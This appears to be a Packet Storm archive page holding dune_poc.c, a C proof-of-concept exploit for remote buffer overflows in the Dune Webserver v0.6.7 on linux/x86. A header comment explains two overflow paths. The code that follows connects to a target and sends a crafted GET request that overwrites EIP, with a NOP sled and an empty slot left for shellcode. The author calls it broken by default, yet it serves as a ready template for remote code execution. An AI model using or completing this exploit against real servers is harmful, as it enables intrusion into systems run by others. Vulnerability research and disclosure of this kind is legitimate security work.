what you don't know can hurt you

dune_poc.c

dune_poc.c
Posted Jul 20, 2000
Authored by vade79, realhalo | Site realhalo.org

The Dune Webserver v0.6.7 has remotely exploitable buffer overflows. This code is a proof of concept exploit for linux/x86.

tags | exploit, overflow, x86, proof of concept
systems | linux
MD5 | e624c6c43e64eb507ebe394051759916

dune_poc.c

Change Mirror Download
/* (linux)dune[v0.6.7-] remote buffer overflow concept, by v9[v9@fakehalo.org].
advisory with broken proof of concept code designed and coded for linux.

the dune http daemon for linux has multiple buffer overflow conditions:

1. sending a large string on connect.
a. send [572 characters][4 pointer characters][1 character] to overwrite
esi(and eax in the 500's somewheres :)).
b. a very large buffer will overflow in strcat(). (1 byte)
2. send "GET /~[small buffer][return][return]". this will overflow in eip
as a result.

this "proof of concept" version is for the 2nd overflow listed. this will
simply overwrite the eip pointer, you will have to find another place to put
the asm/shellcode if you want to exploit it(the username buffer is simply
too small to put anything useful to run).

note: * the "shellcode" should be placed in "char exec[]=" seen below, and
the output(with nops) will be put in the character array "code".
* offsets for this may be sensitive.
* dune won't crash if the program has a segmentation fault, so you can
play around as much as needed.
* this was tested on dune[v0.6.7](with the fork()'s taken out of the
source for testing)
* invalid pointers(with a larger buffer/+128) may make the remote hosts
cpu usage get very high. (very annoying when testing *g*)
* this method won't show up in the log(dune.errors). (method#1 will)
* remember, this is broken, won't run any "shellcode" by default.
*/

#define DEFAULT_PORT 80 // default port.
#define DEFAULT_OFFSET 0x12345678 // base offset. (offset parm adds on)
#define DEFAULT_ALIGN 0 // eip overwrite alignment.
#define TIMEOUT 8 // wait before connection.
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
static char exec[]="fill me!"; // only made this space for 128bytes(with nops).
void timeout(){printf("connection timeout(%d).\n",TIMEOUT);exit(-1);}
int main(int argc,char **argv){
char buf[128],target[256],bofeip[64],code[128];
int i,sock,port,align;
long ret;
struct hostent *t;
struct sockaddr_in s;
if(argc<2){printf("*** syntax: %s <target> [port] [offset] [alignment].\n",argv[0]);exit(-1);}
else{strncpy(target,argv[1],256);}
if(argc>2){port=atoi(argv[2]);}else{port=DEFAULT_PORT;}
if(argc>3){ret=(atoi(argv[3])+DEFAULT_OFFSET);}else{ret=DEFAULT_OFFSET;}
if(argc>4){
if(atoi(argv[4])<0||atoi(argv[4])>3){printf("invalid alignment, using default. (0-3)\n");align=DEFAULT_ALIGN;}
else{align=atoi(argv[4]);}
}
else{align=DEFAULT_ALIGN;}
bofeip[0]=0x2F; // a slash, make it a valid url for dune.
bofeip[1]=0x7E; // username("multiuser") identification character.
for(i=2;i<(2+align);i++){*(bofeip+i)=0x01;} // lame alignment fill method.
for(i=(2+align);i<(58+align);i+=4){*(long *)&bofeip[i]=ret;}
for(i=0;i<(127-strlen(exec));i++){*(code+i)=0x90;}
memcpy(code+i,exec,strlen(exec));
if(s.sin_addr.s_addr=inet_addr(target)){
if(!(t=gethostbyname(target))){printf("error: couldn't resolve. (%s)\n",target);exit(-1);}
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
s.sin_family=AF_INET;
s.sin_port=htons(port);
sock=socket(AF_INET,SOCK_STREAM,0);
printf("(linux)dune[httpd] remote buffer overflow. (address: 0x%lx, alignment: %d)\n",ret,align);
printf("status: testing target. (%s:%d)\n",target,port);
signal(SIGALRM,timeout);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){printf("error: connection failed.\n");exit(-1);}
alarm(0);
printf("status: connected, sending buffer.\n");
snprintf(buf,strlen(buf),"GET %s\n\n",bofeip);
write(sock,buf,strlen(buf));
sleep(1); // saftey first.
close(sock);
printf("status: eip overwrite test complete.\n");
exit(0);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    17 Files
  • 23
    Mar 23rd
    1 Files
  • 24
    Mar 24th
    1 Files
  • 25
    Mar 25th
    16 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close